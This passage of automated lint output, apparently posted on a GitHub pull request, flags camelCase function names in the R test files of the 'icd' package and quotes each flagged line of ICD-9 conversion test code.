^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:628:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L628) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:629:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L629) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:632:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L632) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:633:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L633) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:636:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L636) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:637:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L637) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:652:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L652) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:284:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L284) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:285:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L285) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:286:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L286) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:287:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L287) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:288:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L288) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:289:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L289) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:295:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L295) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:296:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L296) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:297:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L297) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:298:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L298) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:299:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L299) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:300:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L300) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:309:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:310:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L310) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:311:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L311) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:312:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L312) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:313:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L313) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:314:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L314) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:321:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L321) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:322:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L322) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:323:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L323) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:324:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L324) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)), \"10023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:329:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:331:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:333:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:334:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L334) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:338:20:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L338) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:343:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L343) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:346:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:351:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:358:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L358) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/tests-deprecated/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:147:9:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-util.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:469:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-valid.R#L469) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:474:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-valid.R#L474) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:479:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-valid.R#L479) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:304:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:305:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L305) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:306:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L306) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:307:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L307) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:308:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L308) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:309:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:315:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L315) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:316:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L316) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:317:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L317) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:318:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L318) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:328:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L328) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:329:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:330:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L330) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:331:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:332:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L332) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:333:18:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:339:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L339) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:341:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L341) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:344:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L344) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:346:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:349:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L349) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:351:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:361:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L361) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:362:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L362) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:366:20:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L366) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:371:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L371) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:374:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L374) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               